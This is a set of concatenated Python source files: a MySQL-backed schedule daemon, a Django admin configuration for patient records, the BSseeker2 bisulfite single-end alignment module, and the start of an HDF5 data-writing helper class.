import time
from com.sundaytoz import bigshow
import pymysql.cursors
from pymysql.converters import conversions, through
from pymysql.constants import FIELD_TYPE
from datetime import datetime
pid = "/tmp/com.sundaytoz.schedule.pid"
formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.propagate = False
fh = logging.FileHandler("/tmp/com.sundaytoz.schedule.log", "a")
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
keep_fds = [fh.stream.fileno()]
def main():
while True:
check_schedule()
time.sleep(60)
def check_schedule():
now = datetime.now()
time_minute = now.minute
time_hour = now.hour
time_month = now.month
time_day = now.day
time_date = now.weekday()
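    # A negative value in a time_* column means the field is unset and acts as a
    # wildcard; the OR branches below cover the supported minute/hour/day/month/
    # weekday combinations.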
sql = "SELECT * FROM schedules WHERE " \
"(time_minute={minute} and time_hour<0 and time_day<0 and time_month<0 and time_date<0)" \
"OR (time_minute={minute} and time_hour={hour} and time_day<0 and time_month<0 and time_date<0) " \
"OR (time_minute={minute} and time_hour={hour} and time_day={day} and time_month<0 and time_date<0) " \
"OR (time_minute={minute} and time_hour={hour} and time_day={day} and time_month={month} and time_date<0) " \
"OR (time_minute={minute} and time_hour={hour} and time_day<0 and time_month<0 and time_date={date}) "\
.format(minute=time_minute, hour=time_hour, day=time_day, month=time_month, date=time_date)
connection = get_db()
try:
with connection.cursor() as cursor:
cursor.execute(sql)
schedules = cursor.fetchall()
if schedules:
for schedule in schedules:
chart_id = "schedule-{schedule_id}".format(schedule_id=schedule['id'])
results, error = bigshow.Chart.query_sync(chart_id=chart_id,
resource=schedule['resource'],
query_type=schedule['query_type'],
query=schedule['query'],
query_params=schedule['query_params'])
logger.debug("{schedule_id} : error={error}".format(time=datetime.now().strftime("%y%m%d %H%M%S"), schedule_id=schedule['id'], error={error}))
finally:
connection.close()
def get_db():
conversions[FIELD_TYPE.TIMESTAMP] = through
from config.dev import config
db_config = config['db']['default']
return pymysql.connect(host=db_config["host"],
user=db_config["user"],
password=db_config["password"],
db=db_config["db"],
charset=db_config["charset"],
cursorclass=pymysql.cursors.DictCursor,
conv=conversions)
daemon = Daemonize(app="schedule", pid=pid, action=main, keep_fds=keep_fds, logger=logger)
daemon.start()
|
omwomotieno/tunza_v3 | refs/heads/work_branch | register/admin.py | 1 | from django.contrib import admin
from .models import Patient, Discharge
from .forms import PatientForm, DischargeForm # WeightForm, BPForm, NoteForm, WeekForm, SignUpForm
class PatientAdmin(admin.ModelAdmin):
list_display = ('anc_number', 'patient_name', 'last_menstrual_date', 'patient_contact',)
list_display_links = ('patient_name',)
list_editable = ('patient_contact',)
list_per_page = (6)
search_fields = ('patient_name', 'anc_number',)
form = PatientForm
admin.site.register(Patient, PatientAdmin)
class DischargeAdmin(admin.ModelAdmin):
list_display = ('discharged','patient',)
list_display_links = ('patient',)
form = DischargeForm
admin.site.register(Discharge, DischargeAdmin )
|
BioInfoTools/BSVF | refs/heads/master | bin/BSseeker2/bs_align/bs_single_end.py | 1 | import fileinput, os, time, random, math
from bs_utils.utils import *
from bs_align_utils import *
import gzip
#----------------------------------------------------------------
# Read from the mapped results, return lists of unique / multiple-hit reads
# The function suppose at most 2 hits will be reported in single file
def extract_mapping(ali_file):
unique_hits = {}
non_unique_hits = {}
header0 = ""
lst = []
for header, chr, location, no_mismatch, cigar in process_aligner_output(ali_file):
#------------------------------
if header != header0:
#---------- output -----------
if len(lst) == 1:
unique_hits[header0] = lst[0] # [no_mismatch, chr, location]
elif len(lst) > 1:
min_lst = min(lst, key = lambda x: x[0])
max_lst = max(lst, key = lambda x: x[0])
if min_lst[0] < max_lst[0]:
unique_hits[header0] = min_lst
else:
non_unique_hits[header0] = min_lst[0]
#print "multiple hit", header, chr, location, no_mismatch, cigar # test
header0 = header
lst = [(no_mismatch, chr, location, cigar)]
else: # header == header0, same header (read id)
lst.append((no_mismatch, chr, location, cigar))
if len(lst) == 1:
unique_hits[header0] = lst[0] # [no_mismatch, chr, location]
elif len(lst) > 1:
min_lst = min(lst, key = lambda x: x[0])
max_lst = max(lst, key = lambda x: x[0])
if min_lst[0] < max_lst[0]:
unique_hits[header0] = min_lst
else:
non_unique_hits[header0] = min_lst[0]
return unique_hits, non_unique_hits
def bs_single_end(main_read_file, asktag, adapter_file, cut1, cut2, no_small_lines,
max_mismatch_no, aligner_command, db_path, tmp_path, outfile,
XS_pct, XS_count, adapter_mismatch, show_multiple_hit, show_unmapped_hit):
logm("----------------------------------------------" )
logm("Read filename: %s" % main_read_file)
logm("The first base (for mapping): %d" % cut1 )
logm("The last base (for mapping): %d" % cut2 )
logm("Path for short reads aligner: %s" % aligner_command + '\n')
logm("Reference genome library path: %s" % db_path )
if asktag == "Y" :
logm("Un-directional library" )
else :
logm("Directional library")
# end-of-if
logm("Number of mismatches allowed: %s" % str(max_mismatch_no) )
# adapter : strand-specific or not
adapter = ""
adapter_fw = ""
adapter_rc = ""
if adapter_file != "":
try :
adapter_inf = open(adapter_file, "r")
if asktag == "N": #<--- directional library
adapter = adapter_inf.readline()
adapter_inf.close()
adapter = adapter.rstrip("\n")[0:10]
elif asktag == "Y":#<--- un-directional library
adapter_fw = adapter_inf.readline()
adapter_rc = adapter_inf.readline()
adapter_inf.close()
adapter_fw = adapter_fw.rstrip("\n")[0:10]
adapter_rc = adapter_rc.rstrip("\n")[-10::]
if adapter_rc == "" :
adapter_rc = reverse_compl_seq(adapter_fw)
adapter_inf.close()
except IOError:
print "[Error] Cannot open adapter file : %s" % adapter_file
exit(-1)
if adapter_file != "":
if asktag == "N": #<--- directional library
logm("Adapter sequence: %s" % adapter)
elif asktag == "Y":
logm("3\' end adapter sequence: %s" % adapter_fw)
logm("5\' end adapter sequence: %s" % adapter_rc)
logm("-------------------------------- " )
# helper method to join fname with tmp_path
tmp_d = lambda fname: os.path.join(tmp_path, fname)
db_d = lambda fname: os.path.join(db_path, fname)
# splitting the big read file
input_fname = os.path.split(main_read_file)[1]
#---- Stats ------------------------------------------------------------
all_raw_reads = 0
all_trimmed = 0
all_mapped = 0
all_mapped_passed = 0
all_base_before_trim = 0
all_base_after_trim = 0
all_base_mapped = 0
numbers_premapped_lst = [0, 0, 0, 0]
numbers_mapped_lst = [0, 0, 0, 0]
mC_lst = [0, 0, 0]
uC_lst = [0, 0, 0]
no_my_files = 0
#----------------------------------------------------------------
if show_multiple_hit is not None:
outf_MH=open(show_multiple_hit,'w')
if show_unmapped_hit is not None :
outf_UH=open(show_unmapped_hit,'w')
for read_file in isplit_file(main_read_file, tmp_d(input_fname)+'-s-', no_small_lines):
# for read_file in my_files:
original_bs_reads = {}
no_my_files+=1
random_id = ".tmp-"+str(random.randint(1000000, 9999999))
#-------------------------------------------------------------------
# un-directional sequencing
#-------------------------------------------------------------------
if asktag=="Y":
#----------------------------------------------------------------
outfile2=tmp_d('Trimmed_C2T.fa'+random_id)
outfile3=tmp_d('Trimmed_G2A.fa'+random_id)
outf2=open(outfile2,'w')
outf3=open(outfile3,'w')
#----------------------------------------------------------------
# detect format of input file
try :
if read_file.endswith(".gz") : # support input file ending with ".gz"
read_inf = gzip.open(read_file, "rb")
else :
read_inf=open(read_file,"r")
except IOError :
print "[Error] Cannot open input file : %s" % read_file
exit(-1)
logm("Start reading and trimming the input sequences")
oneline = read_inf.readline()
if oneline == "" :
oneline = "NNNN"
l = oneline.split()
input_format = ""
if oneline[0]=="@":
input_format = "fastq"
elif len(l)==1 and oneline[0]!=">":
input_format = "seq"
elif len(l)==11:
input_format = "qseq"
elif oneline[0]==">":
input_format = "fasta"
read_inf.close()
#----------------------------------------------------------------
# read sequence, remove adapter and convert
read_id = ""
seq = ""
seq_ready = "N"
line_no = 0
fw_trimmed = 0
rc_trimmed = 0
for line in fileinput.input(read_file, openhook=fileinput.hook_compressed): # allow input with .gz
if line == "" : # fix bug for empty input line
line = "NNNN"
l = line.split()
line_no += 1
if input_format=="seq":
all_raw_reads += 1
read_id = str(all_raw_reads)
read_id = read_id.zfill(12)
seq = l[0]
seq_ready = "Y"
elif input_format=="fastq":
l_fastq = math.fmod(line_no, 4)
if l_fastq == 1 :
all_raw_reads += 1
read_id = l[0][1:]
seq_ready = "N"
elif l_fastq == 2 :
seq = l[0]
seq_ready = "Y"
else :
seq = ""
seq_ready = "N"
elif input_format=="qseq":
all_raw_reads += 1
read_id = str(all_raw_reads)
read_id = read_id.zfill(12)
seq = l[8]
seq_ready = "Y"
elif input_format=="fasta" :
l_fasta = math.fmod(line_no,2)
if l_fasta==1:
all_raw_reads += 1
read_id = l[0][1:]
seq = ""
seq_ready = "N"
elif l_fasta==0 :
seq = l[0]
seq_ready = "Y"
#----------------------------------------------------------------
if seq_ready=="Y":
seq=seq[cut1-1:cut2] #<---- selecting 0..52 from 1..72 -e 52
seq=seq.upper()
seq=seq.replace(".","N")
# striping BS adapter from 3' read
all_base_before_trim += len(seq)
if (adapter_fw !="") or (adapter_rc !="") :
new_read = RemoveAdapter(seq, adapter_fw, adapter_mismatch)
if len(new_read) < len(seq) :
fw_trimmed += 1
new_read_len = len(new_read)
#print new_read
new_read = Remove_5end_Adapter(new_read, adapter_rc, adapter_mismatch)
new_read = RemoveAdapter(new_read, adapter_fw, adapter_mismatch)
if len(new_read) < new_read_len :
rc_trimmed += 1
#print new_read
if len(new_read) < len(seq) :
all_trimmed += 1
seq = new_read
all_base_after_trim += len(seq)
if len(seq)<=4:
seq=''.join(["N" for x in xrange(cut2-cut1+1)])
#--------- trimmed_raw_BS_read ------------------
original_bs_reads[read_id] = seq
#--------- FW_C2T ------------------
outf2.write('>%s\n%s\n' % (read_id, seq.replace("C","T")))
#--------- RC_G2A ------------------
outf3.write('>%s\n%s\n' % (read_id, seq.replace("G","A")))
fileinput.close()
outf2.close()
outf3.close()
delete_files(read_file)
logm("Reads trimmed from 3\' end : %d " % fw_trimmed)
logm("Reads trimmed from 5\' end : %d " % rc_trimmed)
#--------------------------------------------------------------------------------
# Bowtie mapping
#-------------------------------------------------------------------------------
logm("Start mapping")
WC2T=tmp_d("W_C2T_m"+str(max_mismatch_no)+".mapping"+random_id)
CC2T=tmp_d("C_C2T_m"+str(max_mismatch_no)+".mapping"+random_id)
WG2A=tmp_d("W_G2A_m"+str(max_mismatch_no)+".mapping"+random_id)
CG2A=tmp_d("C_G2A_m"+str(max_mismatch_no)+".mapping"+random_id)
# print aligner_command % {'int_no_mismatches' : int_no_mismatches,
# 'reference_genome' : os.path.join(db_path,'W_C2T'),
# 'input_file' : outfile2,
# 'output_file' : WC2T}
run_in_parallel([ aligner_command % {'reference_genome' : os.path.join(db_path,'W_C2T'),
'input_file' : outfile2,
'output_file' : WC2T},
aligner_command % {'reference_genome' : os.path.join(db_path,'C_C2T'),
'input_file' : outfile2,
'output_file' : CC2T},
aligner_command % {'reference_genome' : os.path.join(db_path,'W_G2A'),
'input_file' : outfile3,
'output_file' : WG2A},
aligner_command % {'reference_genome' : os.path.join(db_path,'C_G2A'),
'input_file' : outfile3,
'output_file' : CG2A} ])
delete_files(outfile2, outfile3)
#--------------------------------------------------------------------------------
# Post processing
#--------------------------------------------------------------------------------
FW_C2T_U,FW_C2T_R=extract_mapping(WC2T)
RC_G2A_U,RC_G2A_R=extract_mapping(CG2A)
FW_G2A_U,FW_G2A_R=extract_mapping(WG2A)
RC_C2T_U,RC_C2T_R=extract_mapping(CC2T)
#----------------------------------------------------------------
# get unique-hit reads
#----------------------------------------------------------------
Union_set=set(FW_C2T_U.iterkeys()) | set(RC_G2A_U.iterkeys()) | set(FW_G2A_U.iterkeys()) | set(RC_C2T_U.iterkeys())
Unique_FW_C2T=set() # +
Unique_RC_G2A=set() # +
Unique_FW_G2A=set() # -
Unique_RC_C2T=set() # -
Multiple_hits=set()
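            # For each read keep the hit with the fewest mismatches across the four
            # alignments; if that minimum is shared, or comes from a multiple-hit
            # list, the read is counted as a multiple hit instead.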
for x in Union_set:
_list=[]
for d in [FW_C2T_U, RC_G2A_U, FW_G2A_U, RC_C2T_U]:
mis_lst=d.get(x,[99])
mis=int(mis_lst[0])
_list.append(mis)
for d in [FW_C2T_R, RC_G2A_R, FW_G2A_R, RC_C2T_R]:
mis=d.get(x,99)
_list.append(mis)
mini=min(_list)
if _list.count(mini) == 1:
mini_index=_list.index(mini)
if mini_index == 0:
Unique_FW_C2T.add(x)
elif mini_index == 1:
Unique_RC_G2A.add(x)
elif mini_index == 2:
Unique_FW_G2A.add(x)
elif mini_index == 3:
Unique_RC_C2T.add(x)
# if mini_index = 4,5,6,7, indicating multiple hits
else :
Multiple_hits.add(x)
else :
Multiple_hits.add(x)
# write reads rejected by Multiple Hits to file
if show_multiple_hit is not None :
#outf_MH=open(show_multiple_hit,'w')
for i in Multiple_hits :
outf_MH.write(">%s\n" % i)
outf_MH.write("%s\n" % original_bs_reads[i])
#outf_MH.close()
# write unmapped reads to file
if show_unmapped_hit is not None :
#outf_UH=open(show_unmapped_hit,'w')
for i in original_bs_reads :
if i not in Union_set :
outf_UH.write(">%s\n" % i)
outf_UH.write("%s\n" % original_bs_reads[i])
#outf_UH.close()
del Union_set
del FW_C2T_R
del FW_G2A_R
del RC_C2T_R
del RC_G2A_R
FW_C2T_uniq_lst=[[FW_C2T_U[u][1],u] for u in Unique_FW_C2T]
FW_G2A_uniq_lst=[[FW_G2A_U[u][1],u] for u in Unique_FW_G2A]
RC_C2T_uniq_lst=[[RC_C2T_U[u][1],u] for u in Unique_RC_C2T]
RC_G2A_uniq_lst=[[RC_G2A_U[u][1],u] for u in Unique_RC_G2A]
FW_C2T_uniq_lst.sort()
RC_C2T_uniq_lst.sort()
FW_G2A_uniq_lst.sort()
RC_G2A_uniq_lst.sort()
FW_C2T_uniq_lst=[x[1] for x in FW_C2T_uniq_lst]
RC_C2T_uniq_lst=[x[1] for x in RC_C2T_uniq_lst]
FW_G2A_uniq_lst=[x[1] for x in FW_G2A_uniq_lst]
RC_G2A_uniq_lst=[x[1] for x in RC_G2A_uniq_lst]
#----------------------------------------------------------------
numbers_premapped_lst[0] += len(Unique_FW_C2T)
numbers_premapped_lst[1] += len(Unique_RC_G2A)
numbers_premapped_lst[2] += len(Unique_FW_G2A)
numbers_premapped_lst[3] += len(Unique_RC_C2T)
del Unique_FW_C2T
del Unique_FW_G2A
del Unique_RC_C2T
del Unique_RC_G2A
#----------------------------------------------------------------
nn=0
gseq = dict()
chr_length = dict()
for ali_unique_lst, ali_dic in [(FW_C2T_uniq_lst,FW_C2T_U),
(RC_G2A_uniq_lst,RC_G2A_U),
(FW_G2A_uniq_lst,FW_G2A_U),
(RC_C2T_uniq_lst,RC_C2T_U)]:
nn += 1
for header in ali_unique_lst:
_, mapped_chr, mapped_location, cigar = ali_dic[header]
original_BS = original_bs_reads[header]
#-------------------------------------
if mapped_chr not in gseq:
gseq[mapped_chr] = deserialize(db_d(mapped_chr))
chr_length[mapped_chr] = len(gseq[mapped_chr])
if nn == 2 or nn == 3:
cigar = list(reversed(cigar))
r_start, r_end, g_len = get_read_start_end_and_genome_length(cigar)
all_mapped += 1
if nn == 1: # +FW mapped to + strand:
FR = "+FW"
mapped_strand="+"
elif nn == 2: # +RC mapped to + strand:
FR = "+RC" # RC reads from -RC reflecting the methylation status on Watson strand (+)
mapped_location = chr_length[mapped_chr] - mapped_location - g_len
mapped_strand = "+"
original_BS = reverse_compl_seq(original_BS) # for RC reads
elif nn == 3: # -RC mapped to - strand:
mapped_strand = "-"
FR = "-RC" # RC reads from +RC reflecting the methylation status on Crick strand (-)
original_BS = reverse_compl_seq(original_BS) # for RC reads
elif nn == 4: # -FW mapped to - strand:
mapped_strand = "-"
FR = "-FW"
mapped_location = chr_length[mapped_chr] - mapped_location - g_len
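# Note on the coordinate fix-up above: hits on the reverse-complemented indexes report
# positions relative to the flipped sequence, so (as far as this code shows) they are
# converted back to coordinates on the original reference with chr_length - mapped_location - g_len.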
origin_genome, next, output_genome = get_genomic_sequence(gseq[mapped_chr], mapped_location, mapped_location + g_len, mapped_strand)
r_aln, g_aln = cigar_to_alignment(cigar, original_BS, origin_genome)
if len(r_aln)==len(g_aln):
N_mismatch = N_MIS(r_aln, g_aln)
# if N_mismatch <= int(max_mismatch_no):
mm_no=float(max_mismatch_no)
if (mm_no>=1 and N_mismatch<=mm_no) or (mm_no<1 and N_mismatch<=(mm_no*len(r_aln)) ):
numbers_mapped_lst[nn-1] += 1
all_mapped_passed += 1
methy = methy_seq(r_aln, g_aln + next)
mC_lst, uC_lst = mcounts(methy, mC_lst, uC_lst)
#---XS FILTER----------------
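# The y/z counts below appear to be converted (unmethylated) non-CpG calls and Y/Z the
# unconverted (methylated) ones, so a read whose unconverted non-CpG cytosines exceed
# XS_count and make up more than XS_pct of such sites is tagged XS=1, the usual flag
# for a likely incomplete bisulfite conversion.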
XS = 0
nCH = methy.count('y') + methy.count('z')
nmCH = methy.count('Y') + methy.count('Z')
if( (nmCH>XS_count) and nmCH/float(nCH+nmCH)>XS_pct ) :
XS = 1
outfile.store(header, N_mismatch, FR, mapped_chr, mapped_strand, mapped_location, cigar, original_BS, methy, XS, output_genome = output_genome)
all_base_mapped += len(original_BS)
#----------------------------------------------------------------
logm("--> %s (%d) "%(read_file, no_my_files))
delete_files(WC2T, WG2A, CC2T, CG2A)
#--------------------------------------------------------------------
# directional sequencing
#--------------------------------------------------------------------
if asktag=="N":
#----------------------------------------------------------------
outfile2=tmp_d('Trimmed_C2T.fa'+random_id)
outf2=open(outfile2,'w')
#----------------------------------------------------------------
try :
if read_file.endswith(".gz") : # support input file ending with ".gz"
read_inf = gzip.open(read_file, "rb")
else :
read_inf=open(read_file,"r")
except IOError :
print "[Error] Cannot open input file : %s" % read_file
exit(-1)
logm("Start reading and trimming the input sequences")
oneline = read_inf.readline()
if oneline == "" :
oneline = "NNNN"
l = oneline.split()
input_format = ""
if oneline[0]=="@":
input_format = "fastq"
elif len(l)==1 and oneline[0]!=">":
input_format = "seq"
elif len(l)==11:
input_format = "qseq"
elif oneline[0]==">":
input_format = "fasta"
read_inf.close()
#print "detected data format: %s"%(input_format)
#----------------------------------------------------------------
read_id=""
seq=""
seq_ready="N"
line_no = 0
for line in fileinput.input(read_file, openhook=fileinput.hook_compressed):
if line == "" :
line = "NNNN"
l = line.split()
line_no += 1
if input_format=="seq":
all_raw_reads += 1
read_id = str(all_raw_reads)
read_id = read_id.zfill(12)
seq = l[0]
seq_ready = "Y"
elif input_format=="fastq":
l_fastq = math.fmod(line_no, 4)
if l_fastq == 1 :
all_raw_reads += 1
read_id = l[0][1:]
seq_ready = "N"
elif l_fastq == 2 :
seq = l[0]
seq_ready = "Y"
else :
seq = ""
seq_ready = "N"
elif input_format=="qseq":
all_raw_reads += 1
read_id = str(all_raw_reads)
read_id = read_id.zfill(12)
seq = l[8]
seq_ready = "Y"
elif input_format=="fasta" :
l_fasta = math.fmod(line_no,2)
if l_fasta==1:
all_raw_reads += 1
read_id = l[0][1:]
seq = ""
seq_ready = "N"
elif l_fasta==0 :
seq = l[0]
seq_ready = "Y"
#--------------------------------
if seq_ready=="Y":
seq=seq[cut1-1:cut2] #<---selecting 0..52 from 1..72 -e 52
seq=seq.upper()
seq=seq.replace(".","N")
#--striping adapter from 3' read -------
all_base_before_trim += len(seq)
if adapter != "":
new_read = RemoveAdapter(seq, adapter, adapter_mismatch)
if len(new_read) < len(seq) :
all_trimmed += 1
seq = new_read
all_base_after_trim += len(seq)
if len(seq)<=4:
seq = "N" * (cut2-cut1+1)
#--------- trimmed_raw_BS_read ------------------
original_bs_reads[read_id] = seq
#--------- FW_C2T ------------------
outf2.write('>%s\n%s\n' % (read_id, seq.replace("C","T")))
fileinput.close()
outf2.close()
delete_files(read_file)
#--------------------------------------------------------------------------------
# Bowtie mapping
#--------------------------------------------------------------------------------
logm("Start mapping")
WC2T=tmp_d("W_C2T_m"+str(max_mismatch_no)+".mapping"+random_id)
CC2T=tmp_d("C_C2T_m"+str(max_mismatch_no)+".mapping"+random_id)
run_in_parallel([ aligner_command % {'reference_genome' : os.path.join(db_path,'W_C2T'),
'input_file' : outfile2,
'output_file' : WC2T},
aligner_command % {'reference_genome' : os.path.join(db_path,'C_C2T'),
'input_file' : outfile2,
'output_file' : CC2T} ])
delete_files(outfile2)
#--------------------------------------------------------------------------------
# Post processing
#--------------------------------------------------------------------------------
FW_C2T_U, FW_C2T_R = extract_mapping(WC2T)
RC_C2T_U, RC_C2T_R = extract_mapping(CC2T)
#----------------------------------------------------------------
# get unique-hit reads
#----------------------------------------------------------------
Union_set = set(FW_C2T_U.iterkeys()) | set(RC_C2T_U.iterkeys())
Unique_FW_C2T = set() # +
Unique_RC_C2T = set() # -
Multiple_hits=set()
# write reads rejected by Multiple Hits to file
for x in Union_set:
_list=[]
for d in [FW_C2T_U,RC_C2T_U]:
mis_lst=d.get(x,[99])
mis=int(mis_lst[0])
_list.append(mis)
for d in [FW_C2T_R,RC_C2T_R]:
mis=d.get(x,99)
_list.append(mis)
mini=min(_list)
#print _list
if _list.count(mini)==1:
mini_index=_list.index(mini)
if mini_index==0:
Unique_FW_C2T.add(x)
elif mini_index==1:
Unique_RC_C2T.add(x)
else:
Multiple_hits.add(x)
else :
Multiple_hits.add(x)
# write reads rejected by Multiple Hits to file
if show_multiple_hit is not None:
#outf_MH=open(show_multiple_hit,'w')
for i in Multiple_hits :
outf_MH.write(">%s\n" % i)
outf_MH.write("%s\n" % original_bs_reads[i])
#outf_MH.close()
# write unmapped reads to file
if show_unmapped_hit is not None :
#outf_UH=open(show_unmapped_hit,'w')
for i in original_bs_reads :
if i not in Union_set :
outf_UH.write(">%s\n" % i)
outf_UH.write("%s\n" % original_bs_reads[i])
#outf_UH.close()
FW_C2T_uniq_lst=[[FW_C2T_U[u][1],u] for u in Unique_FW_C2T]
RC_C2T_uniq_lst=[[RC_C2T_U[u][1],u] for u in Unique_RC_C2T]
FW_C2T_uniq_lst.sort()
RC_C2T_uniq_lst.sort()
FW_C2T_uniq_lst=[x[1] for x in FW_C2T_uniq_lst]
RC_C2T_uniq_lst=[x[1] for x in RC_C2T_uniq_lst]
#----------------------------------------------------------------
numbers_premapped_lst[0] += len(Unique_FW_C2T)
numbers_premapped_lst[1] += len(Unique_RC_C2T)
#----------------------------------------------------------------
nn = 0
gseq = dict()
chr_length = dict()
for ali_unique_lst, ali_dic in [(FW_C2T_uniq_lst,FW_C2T_U),(RC_C2T_uniq_lst,RC_C2T_U)]:
nn += 1
for header in ali_unique_lst:
_, mapped_chr, mapped_location, cigar = ali_dic[header]
original_BS = original_bs_reads[header]
#-------------------------------------
if mapped_chr not in gseq :
gseq[mapped_chr] = deserialize(db_d(mapped_chr))
chr_length[mapped_chr] = len(gseq[mapped_chr])
r_start, r_end, g_len = get_read_start_end_and_genome_length(cigar)
all_mapped+=1
if nn == 1: # +FW mapped to + strand:
FR = "+FW"
mapped_strand = "+"
elif nn == 2: # -FW mapped to - strand:
mapped_strand = "-"
FR = "-FW"
mapped_location = chr_length[mapped_chr] - mapped_location - g_len
origin_genome, next, output_genome = get_genomic_sequence(gseq[mapped_chr], mapped_location, mapped_location + g_len, mapped_strand)
r_aln, g_aln = cigar_to_alignment(cigar, original_BS, origin_genome)
if len(r_aln) == len(g_aln):
N_mismatch = N_MIS(r_aln, g_aln) #+ original_BS_length - (r_end - r_start) # mismatches in the alignment + soft clipped nucleotides
mm_no=float(max_mismatch_no)
if (mm_no>=1 and N_mismatch<=mm_no) or (mm_no<1 and N_mismatch<=(mm_no*len(r_aln)) ):
numbers_mapped_lst[nn-1] += 1
all_mapped_passed += 1
methy = methy_seq(r_aln, g_aln+next)
mC_lst, uC_lst = mcounts(methy, mC_lst, uC_lst)
#---XS FILTER----------------
XS = 0
nCH = methy.count('y') + methy.count('z')
nmCH = methy.count('Y') + methy.count('Z')
if( (nmCH>XS_count) and nmCH/float(nCH+nmCH)>XS_pct ) :
XS = 1
outfile.store(header, N_mismatch, FR, mapped_chr, mapped_strand, mapped_location, cigar, original_BS, methy, XS, output_genome = output_genome)
all_base_mapped += len(original_BS)
#----------------------------------------------------------------
logm("--> %s (%d) "%(read_file,no_my_files))
delete_files(WC2T, CC2T)
#----------------------------------------------------------------
delete_files(tmp_path)
if show_multiple_hit is not None:
outf_MH.close()
if show_unmapped_hit is not None :
outf_UH.close()
logm("----------------------------------------------" )
logm("Number of raw reads: %d" % all_raw_reads)
if all_raw_reads > 0 :
logm("Number of bases in total: %d " % all_base_before_trim)
if (asktag == "N" and adapter != "") or (asktag == "Y" and adapter_fw != "") :
logm("Number of reads having adapter removed: %d" % all_trimmed )
trim_percent = (float(all_base_after_trim)/all_base_before_trim) if all_base_before_trim>0 else 0
logm("Number of bases after trimming the adapters: %d (%1.3f)" % (all_base_after_trim, trim_percent) )
#
logm("Number of reads are rejected because of multiple hits: %d" % len(Multiple_hits) )
logm("Number of unique-hits reads (before post-filtering): %d" % all_mapped)
if asktag == "Y":
logm(" %7d FW reads mapped to Watson strand (before post-filtering)" % (numbers_premapped_lst[0]) )
logm(" %7d RC reads mapped to Watson strand (before post-filtering)" % (numbers_premapped_lst[1]) )
logm(" %7d FW reads mapped to Crick strand (before post-filtering)" % (numbers_premapped_lst[2]) )
logm(" %7d RC reads mapped to Crick strand (before post-filtering)" % (numbers_premapped_lst[3]) )
elif asktag == "N":
logm(" %7d FW reads mapped to Watson strand (before post-filtering)" % (numbers_premapped_lst[0]) )
logm(" %7d FW reads mapped to Crick strand (before post-filtering)" % (numbers_premapped_lst[1]) )
logm("Post-filtering %d uniquely aligned reads with mismatches <= %s" % (all_mapped_passed, max_mismatch_no) )
if asktag == "Y":
logm(" %7d FW reads mapped to Watson strand" % (numbers_mapped_lst[0]) )
logm(" %7d RC reads mapped to Watson strand" % (numbers_mapped_lst[1]) )
logm(" %7d FW reads mapped to Crick strand" % (numbers_mapped_lst[2]) )
logm(" %7d RC reads mapped to Crick strand" % (numbers_mapped_lst[3]) )
elif asktag == "N":
logm(" %7d FW reads mapped to Watson strand" % (numbers_mapped_lst[0]) )
logm(" %7d FW reads mapped to Crick strand" % (numbers_mapped_lst[1]) )
Mappability = (100 * float(all_mapped_passed) / all_raw_reads) if all_raw_reads>0 else 0
logm("Mappability = %1.4f%%" % Mappability )
logm("Total bases of uniquely mapped reads : %7d" % all_base_mapped )
#
n_CG = mC_lst[0] + uC_lst[0]
n_CHG = mC_lst[1] + uC_lst[1]
n_CHH = mC_lst[2] + uC_lst[2]
#
logm("----------------------------------------------" )
logm("Methylated C in mapped reads ")
#
logm(" mCG %1.3f%%" % ((100*float(mC_lst[0])/n_CG) if n_CG != 0 else 0))
logm(" mCHG %1.3f%%" % ((100*float(mC_lst[1])/n_CHG) if n_CHG != 0 else 0))
logm(" mCHH %1.3f%%" % ((100*float(mC_lst[2])/n_CHH) if n_CHH != 0 else 0))
#
logm("----------------------------------------------" )
logm("File : %s" % main_read_file )
elapsed("Resource / CPU time")
logm("------------------- END --------------------" )
close_log()
|
iambernie/hdf5handler | refs/heads/master | hdf5handler/handler.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
TODO: Write this missing docstring
"""
import h5py
import numpy
class HDF5Handler(object):
"""
The idea is that the HDF5Handler mimics the behaviour of 'open' used as a
context manager using the 'with' statement:
>>> with open('myfile.txt','w') as file:
... file.write("This is a line. \n")
... file.write("This is another line. \n")
...
>>>
which would result in the file 'myfile.txt' containing:
--------------- myfile.txt ------------------
This is a line.
This is another line.
---------------------------------------------
To "write" data with HDF5Handler, simply call it's put() method.
>>> from hdf5handler import HDF5Handler
>>> thisdata = [1,2,3]
>>> thatdata = [3,2,1]
>>> with HDF5Handler('mydata.hdf5') as handler:
... handler.put(thisdata, "/at/this/location/")
... handler.put(thatdata, "/at/that/location/")
...
>>>
Another Example
---------------
>>> with HDF5Handler('mydata.hdf5') as handler:
... a_scalar = 1.0
... a_list = [1, 2, 3]
... a_numpy_scalar = numpy.float16(1.0)
... an_ndarray = numpy.arange([1, 2, 3])
... for i in range(5):
... handler.put(a_scalar, '/somepath/scalars')
... handler.put(a_list, '/somepath/lists')
... handler.put(a_numpy_scalar, '/numpies/scalars')
... handler.put(an_ndarray, '/numpies/arrays')
...
>>>
Since the second argument of handler.put is simply a POSIX-style path,
this will structure your HDF5 file with the following hierarchy:
/
├── numpies <-- h5py.Group
│ ├── arrays <-- h5py.Dataset
│ └── scalars <-- h5py.Dataset
└── somepath
├── lists
└── scalars
So Datasets and Groups are quite analogous to Files and Folders.
#TODO: open mydata.hdf5 and show it indeed contains the data.
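As a rough sketch of what that check could look like (assuming h5py is
available and 'mydata.hdf5' was written as above; the dataset paths are
the illustrative ones used earlier):
>>> import h5py
>>> with h5py.File('mydata.hdf5', 'r') as f:
...     print(f['/numpies/arrays'].shape)
...     print(f['/somepath/scalars'][:])
...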
"""
def __init__(self, filename, mode='w', prefix=None):
"""
Parameters
----------
filename : str
filename of the hdf5 file.
mode : str
Python mode to open file. The mode can be 'w' or 'a' for writing or
appending. #TODO, check if 'a' mode really works...
prefix : str
#TODO explain prefix, and show typical use case.
"""
self.filename = filename
self.mode = mode
self.prefix = prefix
self.index = dict()
self.index_converters = dict()
def __enter__(self):
# According to h5py docs, libver='latest' is specified for potential
# performance advantages procured by maximum file structure
# sophistication. (Could also mean losing some backwards compatibility)
self.file = h5py.File(self.filename, self.mode, libver='latest')
return self
def __exit__(self, extype, exvalue, traceback):
self.flushbuffers()
self.file.close()
return False
#TODO; how to avoid code replication here?
def open(self):
self.file = h5py.File(self.filename, self.mode, libver='latest')
#TODO; how to avoid code replication here?
def close(self):
self.flushbuffers()
self.file.close()
